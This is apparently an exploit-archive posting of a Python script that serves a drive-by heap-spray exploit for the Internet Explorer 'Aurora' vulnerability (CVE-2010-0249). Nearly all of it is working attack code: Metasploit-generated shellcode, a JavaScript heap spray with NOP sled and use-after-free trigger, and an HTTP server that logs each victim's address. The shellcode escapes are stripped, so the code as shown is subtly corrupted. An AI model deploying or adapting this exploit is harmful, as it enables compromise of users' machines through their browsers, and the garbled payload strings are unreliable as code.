[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Internet Explorer Aurora Exploit
# Published : 2010-01-17
# Author : Ahmed Obied
# Previous Title : Exploit EFS Software Easy Chat Server v2.2
# Next Title : TrendMicro Web-Deployment ActiveX Remote Exec 0day POC
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# This program acts as a web server that generates an exploit to
# target a vulnerability (CVE-2010-0249) in Internet Explorer.
# The exploit was tested using Internet Explorer 6 on Windows XP SP2.
# The exploit's payload spawns the calculator.
#
# Usage : python ie_aurora.py [port number]
#
import sys
import socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def convert_to_utf16(self, payload):
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += '%%u%04x' % num
return enc_payload
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = 'x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73'
payload += 'x13x6fx02xb1x0ex83xebxfcxe2xf4x93xeaxf5x0e'
payload += 'x6fx02x3ax4bx53x89xcdx0bx17x03x5ex85x20x1a'
payload += 'x3ax51x4fx03x5ax47xe4x36x3ax0fx81x33x71x97'
payload += 'xc3x86x71x7ax68xc3x7bx03x6exc0x5axfax54x56'
payload += 'x95x0ax1axe7x3ax51x4bx03x5ax68xe4x0exfax85'
payload += 'x30x1exb0xe5xe4x1ex3ax0fx84x8bxedx2ax6bxc1'
payload += 'x80xcex0bx89xf1x3exeaxc2xc9x02xe4x42xbdx85'
payload += 'x1fx1ex1cx85x07x0ax5ax07xe4x82x01x0ex6fx02'
payload += 'x3ax66x53x5dx80xf8x0fx54x38xf6xecxc2xcax5e'
payload += 'x07x7cx69xecx1cx6ax29xf0xe5x0cxe6xf1x88x61'
payload += 'xd0x62x0cx2cxd4x76x0ax02xb1x0e'
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = '''
<html>
<head>
<script>
var obj, event_obj;
function spray_heap()
{
var chunk_size, payload, nopsled;
chunk_size = 0x80000;
payload = unescape("<PAYLOAD>");
nopsled = unescape("<NOP>");
while (nopsled.length < chunk_size)
nopsled += nopsled;
nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks[i] = nopsled + payload;
}
function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj[i] = document.createElement("COMMENT");
}
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj[i].data = data;
}
event_obj.srcElement;
}
function check()
{
if (navigator.userAgent.indexOf("MSIE") == -1)
return false;
return true;
}
if (check()) {
initialize();
spray_heap();
}
else
window.location = 'about:blank'
</script>
</head>
<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>
'''
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
return exploit
def get_image(self):
content = 'x47x49x46x38x39x61x01x00x01x00x80x00x00xffxffxff'
content += 'x00x00x00x2cx00x00x00x00x01x00x01x00x00x02x02x44'
content += 'x01x00x3b'
return content
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
try:
if self.path == '/':
print
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0]
self.wfile.write(self.get_exploit())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path == '/aurora.gif':
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.end_headers()
self.wfile.write(self.get_image())
except:
print '[*] Error : an error has occured while serving the HTTP request'
print '[-] Exiting ...'
sys.exit(-1)
def main():
if len(sys.argv) != 2:
print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
sys.exit(0)
try:
port = int(sys.argv[1])
if port < 1024 or port > 65535:
raise ValueError
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
try:
serv.serve_forever()
except:
print '[-] Exiting ...'
except socket.error:
print '[*] Error : a socket error has occurred'
sys.exit(-1)
except ValueError:
print '[*] Error : an invalid port number was given'
sys.exit(-1)
if __name__ == '__main__':
main()